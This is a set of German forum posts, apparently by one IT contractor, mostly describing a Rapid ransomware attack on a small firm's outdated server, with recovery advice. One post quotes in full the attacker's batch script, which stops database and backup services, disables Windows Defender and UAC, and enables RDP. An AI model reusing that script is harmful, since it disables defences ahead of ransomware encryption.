Squire

um es abzukürzen - solange Du den Internetzugang Deiner Eltern verwendest kannst Du machen was Du willst - sie sitzen am längeren Hebel. Du kannst ein eigenes Netz machen, aber das hilft Dir nicht. Finde dich damit ab Zitat aus der letztjährigen Dr. Who Silvester Folge: Wifi down, Mobile down, TV streaming down - Mother: We have to do a conversation. Kids: A WHAT?

nun, wenn Deine Eltern Deine Geräte in der Fritzbox gesperrt haben, dann hat das wahrscheinlich einen Grund. Ich würde vorschlagen, Du redest mit ihnen!

@zahni: Yep - schon auf der ersten Seite

Ich hatte so was ähnliches zu Windows 2008r2 Zeiten. Ich hab dann ein kleines Tool gefunden, nannte sich unlocker.exe Der Ordner hatte sich auch über Zeiten nicht löschen lassen, damit ging es dann. Ordner damit ausgewählt und anschließend ließ er sich löschen Das hier war das... http://www.emptyloop.com/unlocker/ gerade gemerkt, dass die Download Links ins Leere laufen .. gibt es aber noch bei Computer Bild oder Chip zum herunterladen https://www.computerbild.de/download/Unlocker-6399684.html

wie ist denn die Lease Dauer auf den beiden DHCPs eingestellt?

@zahni: Öffentliche IP sind bei Vodafone durchaus üblich. Auf dem Firmenhandy mit T-Mobile wird genattet @Dirk-HH-83: Verwende halt einen DynDNS Anbieter. Dann kannst Du auf den Namen gehen

@speer: RDP war von extern nicht offen - Angriffsvektor habe ich oben beschrieben. Da gibt es nix zu rütteln. Die Eventlog Einträge (IP, Name und Zeit sprechen eine deutliche Sprache). Die Frage nach Office und Macros stellt sich nicht, da das Unternehmen nicht mit MS Office arbeitet. Außerdem war ist zur Zeit noch Betriebsruhe ... da war niemand der klicken konnte! @mcse2020: Es ist definitiv RAPID V2/V3 - das haben mehrere Tools auch so zurückgemeldet. Mehrere unverfängliche Dateien wurden zusammen mit dem Kunden durch die gängigen Analysetools geprüft. Und Rapid V2/V3 ist zur Zeit nicht decryptierbar. @MurdocX: Der Kunde braucht alles frisch ... vorhandene Soft und Hardware sind für die Tonne. Dell PowerEdge Server (Tower) mit entsprechenden HDDS, Speicher und Servicelevel, Win 2019 + Cals, Virenschutz, Email Archivierungssoftware, Backup, Hardware Firewall. Dienstleistung für Installation, Übernahme ERP etc. extra. War erstmal eine grobe Überschlagskalkulation. Supportlaufzeiten der Software und Hardware auf 3 bzw. 5 Jahre ... Rechnet man das auf 5 Jahre sind die Kosten bei überschaubaren 2000€ pro Jahr. Das sollte einem seine Unternehmenssicherheit wert sein.

Hallo zusammen, kurzes Fazit der Geschichte: Es war ein direkter Hackerangriff aus dem russischen Raum. Im Eventlog wurden russische IPs und russische Rechnernamen (in kyrillischer Schrift) bei RDP Verbindungen protokolliert. (Trojaner, Viren oder sonstiges waren nicht im Spiel) Der mutmaßliche Angriffsvektor ist folgender: Auf der Fritzbox waren eingehend Ports für POP3/IMAP geöffnet. Dahinter lag der steinalte HMailserver von 2013 mit allen seitdem offenen Lücken (OpenSSL Bibliothek von 2013, inkl Heartbleed Bug, SSL3, TLS1, etc...). Der HMail lief dann auch noch als LocalSystem ... perfekt für den/die Hacker. Die waren dann über mehrere Tage zugange. Am 26.12. wurden alle Schattenkopien und bak-Files auf dem System gelöscht und die Ransomware Rapid V2/V3 aktiviert. Glücklicherweise war/ist die Kiste nicht sonderlich schnell (Raid ohne Batteriecache), so dass nicht alles verschlüsselt wurde. Die manuell gestartete Randsomware war anscheinend nur im Speicher aktiv und wurde durch einen Serverreboot durch den Kunden (bevor ich kontaktiert wurde) unterbrochen ... Glück im Unglück die SQL DB ist unbeschädigt und das ERP funktioniert. @Dr.Melzer: Der Kunde hat doch russische Bekannte und versucht jetzt über Chat auf russisch zu verhandeln - mal sehen was rauskommt. Ich werde jetzt ein Konzept und Angebot für ein neues System unterbreiten - ob das umgesetzt wird ist allerdings fraglich (Hardware, Software und Lizenzen dürfte bei unter 10 T€ liegen ... da kam schon die Ansage ... wir sind ein kleines Unternehmen, das ist aber sehr viel Geld für uns ... naja ... ich sag mal so ... Da hat jemand den Schuß nicht gehört) ... Fazit: Nicht gewartete und alte Software können zu katastrophalen Auswirkungen führen. Die eigentlichen Kosten des Vorfalls werden sich erst in der nächsten Zeit zeigen ...

@XP-Fan: nope ... Fritzbox mit aktivierten myFritz

Danke für den Tipp - leider kenn ich da niemand ... Polen, Tschechen wäre kein Problem - chinesisch könnte meine Frau abdecken ... Der Kunde will heut checken, ob er so erstmal notdürftig arbeiten kann ... ich werde am Wochenende ein Konzept zusammen stellen und ein Angebot machen. Ich bring den Server heute zurück ... Schadsoftware habe ich keine mehr gefunden. Schattenkopien hatte der Hacker übrigens gelöscht. Das war dann leider auch keine Möglichkeit zurück an die Ursprungsdateien zu kommen. Komplett verschlüsselt ist die Kiste aber zum Glück auch nicht. Die ERP Datenbank hat es nicht erwischt und einen großen Teil der Verzeichnisse ebenso ... Der Kunde hat anscheinend Glück im Unglück, dass seine 7 Jahre alte Hardware mit Raid1 und ohne Batteriecache schlicht gemütlich bei der Verschlüsselung vorging ... ... und ja - eine reiner Routerfirewall halte ich persönlich auch nicht für ausreichend. Ich hab zwar auch zu Hause eine Fritzbox und im Fritzbox Netz sind SmartTV, Mobiles, SmartHome Geräte ... und dann kommt dahinter die richtige Firewall mit meinem internen Netz und ESX sowie VMs ... @DocData: ich hab in der Firma schon Phishing/Trojaner Attacken in den Fingern gehabt, da ist erst bei genauer Betrachtung der Mailheaders aufgefallen, dass da was im Busch ist. Ein normaler User hätte wohl geklickt. (War ne Antwort auf eine Projektemail, mit korrekter Ansprache, keine Rechtschreibfehler und Bezugnahme auf eine frühere Email) ... die Jungs lernen dazu! Es geht schließlich ums Geld Ich kann ausschließen, dass da was über Macros in MS Office Dateien reingekommen ist - die arbeiten nämlich nicht mit MS Office sondern mit openOffice. Meines Erachtens war der Einfallvektor alte nicht mehr gepflegte Software WHS2011 ist seit 2016 EOL, wer weiß was es da für Hacks dafür gibt. @SandyB: Wir haben 2019 firmenintern Phishingtests gemacht - es ist erschreckend, wie viele einfach auf Links klicken! Wir hatten zwei Stufen ... erst Klicken und dann noch Credentials ... die Prozentzahlen waren ähnlich .... knapp 35% haben die Link geklickt und gut die Hälfte haben dann noch ihre Zugangsdaten eingegeben. Jeder der glaubt, dass es in seinem Unternehmen anders läuft, möge einfach mal solche Tests durchführen und sich vor der Auswertung gut hinsetzten. Hier greift einfach der Spruch vom "Glashaus" - aber nicht wundern, wenn dann die Scheiben kaputt sind.

Nur kurz, weil vom Mobile aus... Im Eventlog wurden Rdp Verbindungen mit externen IPs protokolliert. Nslookup liefert einen Server bei einem russischen Hoster... Also ziemlich eindeutig. Natürlich gibt es spezielle Forensik Firmen, das ist aber Kundensache, ob er welche beauftragt. Darauf hingewiesen ist er, auch dass ggf. einen Datenabfluss hat, der nach der DSGVO zu melden ist. Aber auch das ist nicht meine Sache und Aufgabe. Ich bin nicht der Admin oder Verantwortliche

@daabm Portscan hab ich heute Nachmittag gemacht - RDP war nicht offen von außen. Allerdings kam die Maleware anscheinend zielgerichtet. Es gibt Log Einträge die zu Servern russischer Betreiber/Hoster gehören. Ich bin Deiner Meinung Spott und Häme haben hier nichts verloren - letztlich kann es jedes Unternehmen treffen. Du kannst alles noch so sicher gestalten und es kann trotzdem was passieren. Einzig - man kann den Schaden minimieren - hast Du ein Unternehmen und kommunizierst Du mit anderen per Mail oder musst auf Grund Deines Unternehmens Daten austauschen bist Du einfach gefährdet. Bei den meisten KMUs läuft IT als notwendiges Übel oder ist eben wie "Gas, Wasser, Schei..." die IT ist halt da und wird als selbstverständlich angesehen und es läuft ja seit Jahren ... wie hier bei diesem Betrieb ... wobei der vorherige Dienstleister Murks auf der ganzen Linie geleistet hat! Er hat grob fahrlässig gehandelt, als er das System dem Kunden empfohlen, verkauft und eingerichtet hat ... ich für meinen Teil kann sagen, entweder der Kunde geht beim vorgeschlagenen Konzept mit, oder ich lehne den Auftrag ab. @martins Thema Mitleid - Mitleid hat bei der Thematik nix zu suchen. Das ist ein Auftrag, der Verantwortung mit sich bringt. Der vorherige Dienstleister hatte bei Konzeption und Umsetzung gröbste Fehler gemacht (Hauptsache billig und geht irgendwie) und einfach schlecht beraten. Das hilft aber nicht weiter, denn letztlich hängen auch bei KMUs Arbeitsplätze davon ab. Was die Beweissicherung angeht - ich hab von den Volumes 1:1 Kopien gemacht (waren 2x Raid1). Allerdings interessiert sich die lokale Polizei herzlich wenig um die Sache. Die haben mehr oder weniger abgewunken und gesagt, dass man da eh wenig rausbekommt, und wenn die Spur ins Ausland führt ist es eh Essig. Hier in diesem Fall wird das wohl so sein ... versuch mal von einem russischen Hoster IP Adressen zurück zu verfolgen lassen. Zum Thema zurück ... Ich lasse im Moment das System durchscannen - es scheint kein aktiver Trojaner etc. drauf zu sein - Registry und die diversen Autorun Schlüssel sind sauber. Anscheinend kam der Hacker irgendwie per RDP auf den Server, hat den Rapid am 26.12. gestartet und verschlüsseln lassen. Es gibt übrigens kein AD, sondern nur eine Workgroup. Keine leeren Passwörter. Kleiner Tipp am Rande ... Für alle Aktionen an einem potentiell verseuchten System ist ein Medium mit Schreibschutz von unschätzbaren Vorteil. USB Sticks mit Schreibschutz sind hier allerdings rar gesät. Ich habe aber eine nette, einfach und kostengünstige Methode gefunden. Es gibt kleine USB SD Card Reader - die SD Cards haben einen physikalischen Schreibschutzschieber ... sprich ich hab meine Tools auf eine SD Card gepackt, Schreibschutz der Karte aktiviert und dann über den USB Reader verbunden (geht auch im abgesicherten Modus). Damit kann ich ausschließen, dass ich mir auf meinem System was einfange ...

@DocData Du kennst weder den Kunden, noch sein Geschäft. Du weißt nicht, was auf dem Server an Daten noch nicht verschlüsselt ist ... wie willst Du dann wissen, ob der Kunde am 7.1. nicht im Notbetrieb arbeiten kann? ich würd mal sagen, Du lehnst Dich zu weit aus dem Fenster und fällst dabei raus! Sprich, wenn Du nix zur Sache dienliches beibringen kannst, sei einfach still und lese meinetwegen einfach mit und murmel in den Monitor! nebenbei - ich denke, dass es für den einen oder anderen ganz interessant sein kann hier mit zu lesen ...

hilft nicht bei Rapid

das muss der Kunde entscheiden, ob er zahlt oder nicht. Ich bin in diesem Fall externer Dienstleister und hab den Kunden vorher auch nicht betreut ... Ich war am 31.12. zum ersten mal bei ihm ... so wie es ausschaut, hört er auf die Polizei und will nicht zahlen ... Anscheinend wurde er gehackt. Ich hab im Eventlog wurden RDP Verbindungen von externen IPs gelogged. Laut Kunde ist RDP nach außen aber nicht offen ...

No More Ransomware kannte ich schon ... zumindest scheint die SQL DB nicht verschlüsselt zu sein ... normales MDF File. Was mich jetzt ein wenig wundert ist, dass ich keinen aktiven Trojaner etc. finde ... nix in den Autorun Schlüsseln etc ... Kann das sein, dass die sich nach erfolgreichen Verschlüsseln selbst wieder rauskicken? Vielleicht ist noch was mit einem SystemRestore Point was zu holen ... ich hatte vorhin den Kunden schon mal telefonisch informiert, dass es dunkel ausschaut ... Für mich heißt das dann wohl am Wochenende ein hübsches Angebot für Server, Software, Backup, AV und Lizenzen zu machen ... das gibt es nicht für 3.50€

Incident Management ... der war gut das bin ich dann wohl selbst ich hab vorhin noch mal andere Dateien gecheckt ... CryptoXXX scheint es nicht zu sein ... da findet kein Decryptor irgendwas ... Emisoft wirft als Ransomware RAPID aus - dafür gibt es keinen decryptor. was ich bisher gefunden hab, wie er sich aktiv setzt ... wie das Teil reingekommen ist ist mir noch unklar - der Kunde behauptet nix geklickt zu haben ... ich hab folgende Datei im Download des Admins unter einem Verzeichnis RRR gefunden - die Exes hat er wohl mit einem AV Scan geschreddert del.bat @echo off START "" %~dp0\RRLL.exe -all START "" %~dp0\NS.exe START "" %~dp0\p.exe net stop MSSQLServerADHelper100 net stop MSSQL$ISARS net stop MSSQL$MSFW net stop SQLAgent$ISARS net stop SQLAgent$MSFW net stop SQLBrowser net stop ReportServer$ISARS net stop SQLWriter net stop WinDefend net stop mr2kserv net stop MSExchangeADTopology net stop MSExchangeFBA net stop MSExchangeIS net stop MSExchangeSA net stop ShadowProtectSvc net stop SPAdminV4 net stop SPTimerV4 net stop SPTraceV4 net stop SPUserCodeV4 net stop SPWriterV4 net stop SPSearch4 net stop MSSQLServerADHelper100 net stop IISADMIN net stop firebirdguardiandefaultinstance net stop ibmiasrw net stop QBCFMonitorService net stop QBVSS net stop QBPOSDBServiceV12 net stop "IBM Domino Server (CProgramFilesIBMDominodata)" net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)" net stop IISADMIN net stop "Simply Accounting Database Connection Manager" net stop QuickBooksDB1 net stop QuickBooksDB2 net stop QuickBooksDB3 net stop QuickBooksDB4 net stop QuickBooksDB5 net stop QuickBooksDB6 net stop QuickBooksDB7 net stop QuickBooksDB8 net stop QuickBooksDB9 net stop QuickBooksDB10 net stop QuickBooksDB11 net stop QuickBooksDB12 net stop QuickBooksDB13 net stop QuickBooksDB14 net stop QuickBooksDB15 net stop QuickBooksDB16 net stop QuickBooksDB17 net stop QuickBooksDB18 net stop QuickBooksDB19 net stop QuickBooksDB20 net stop QuickBooksDB21 net stop QuickBooksDB22 net stop QuickBooksDB23 net stop QuickBooksDB24 net stop QuickBooksDB25 taskkill /f /im mysql* taskkill /f /im IBM* taskkill /f /im bes10* taskkill /f /im black* taskkill /f /im sql taskkill /f /im store.exe taskkill /f /im sql* taskkill /f /im vee* taskkill /f /im postg* taskkill /f /im sage* REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f del %0

ich hab sie rausgenommen ... Werbung war das nicht

Hallo Leute, ich kann das Jahr gleich mit einer kleinen Herausforderung anfangen. Am 31.12. wurde ich von einem Neukunden angerufen, dass sein Server verschlüsselt ist ... Wie sich herrausstellte - absoluter worst case ... alles was man nicht machen sollte liegt hier vor ... Kleine Firma, die mit - festhalten - Windows 2011 HomeServer (EOL 2016) arbeitet Backup des ERP Systems liegt nur auf dem Server (auf nem 2. Raid1) Virenschutz ... irgend ein ComodoAV ... uralt von 2013 ... H-Mailserver mit Mailstore Home (nicht revisionssicher und für betriebliche Nutzung lizenzrechtlich nicht erlaubt) Es gibt kein Backup, auch kein Teilbackup. Die verschlüsselten Dateien weisen die Endung .cryptolocker auf. Laut NoRansomwareProjekt würde das auf CryptXXX V1-V3 hinweisen ... Das Entschlüsselungstool von Trendmicro versagt allerdings der Erpressertext lautet: Glück im Unglück ... es scheint, dass die SQL DB des ERP Programms nicht verschlüsselt ist ... und dass die bis 7.1. Werksurlaub haben ... ich werd die Kiste jetzt erst mal abgesichert hochfahren und die Ransomware beseitigen ... Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ... hat jemand nen Tipp für eine etwaige Entschlüsselung ... ich jeweils einer der Raid1 Platten mittels einer Diskstation auf zwei Platten von mir geklont - damit kann ich dann gefahrlos testen ... Auf alle Fälle erstell ich dem Kunden dann mal ein richtiges IT Konzept und Angebot mit aktueller Hardware, Software, Virenschutz und Backup! Die Firma, die das vorher eingerichtet hat - hat schlicht und ergreifend grob fahrlässig gehandelt ... vom lizenzrechtlichen Dingen will ich mal gar nicht erst reden! ich schüttel immer noch innerlich den Kopf

ok ... musst doch nicht bis zum 7.1. warten ... VPN sei dank ... Also wir haben die Wartungsverlängerungen von CityComp

ich kann am 7.1. mal nachsehen, bei welcher Firma wir 3rd. party Maintenance gebucht haben ... wir haben ein paar Systeme nach dem Leasing rausgekauft (nach 3 Jahren) und lassen den Support dadrüber laufen.

Post warranty care packs sind relativ teuer. Es gibt aber Firmen, die sich auf so etwas spezialisiert haben... Da ist es relativ günstig

ist nicht unüblich - bei einem Rebuild wird die Quell Platte stärker gestresst als im normalen Idle Betrieb. Wenn die da schon ansatzweise ne Macke gehabt hat ... außerdem ... wie ich schon mal geschrieben hab .. ich kenn das aus eigener Erfahrung mit Fremdplatten ... (4x Samsung im Raid5 an einem HP Smartarray ... zwei gleichzeitig gestorben und kurz danach die dritte ... das Ganze bei knapp einem Jahr Laufzeit - ich hab dann neu aufgebaut mit HP Platten ... was soll ich sagen ... die laufen heute noch. Die in meinem jetzigen Server (ML350G6 - 6x300GB SAS und 2x1TB SAS) haben auch schon einige Jahre 24x7 Betrieb hinter sich

und Mailstore kostet nun wirklich nicht die Welt (im Vergleich zu anderen Lösungen sehr günstig) und DU hast alles onpremise und Du bist in der Größe des Archivs nicht limitiert ... bei 5 User kostet Mailstore pro User 59€ (1 Jahr Support - bei längeren Support entsprechend günstiger) Die Homeversion ist für die geschäftliche Nutzung lizenzrechtlich nicht zulässig.

Ich kenn die Telefone jetzt nicht, aber klassischer Weise ziehen IP Phones ihre Konfiguration via TFTP oder FTP ... sicher, dass die Telefone die Konfiguration per HTTP holen?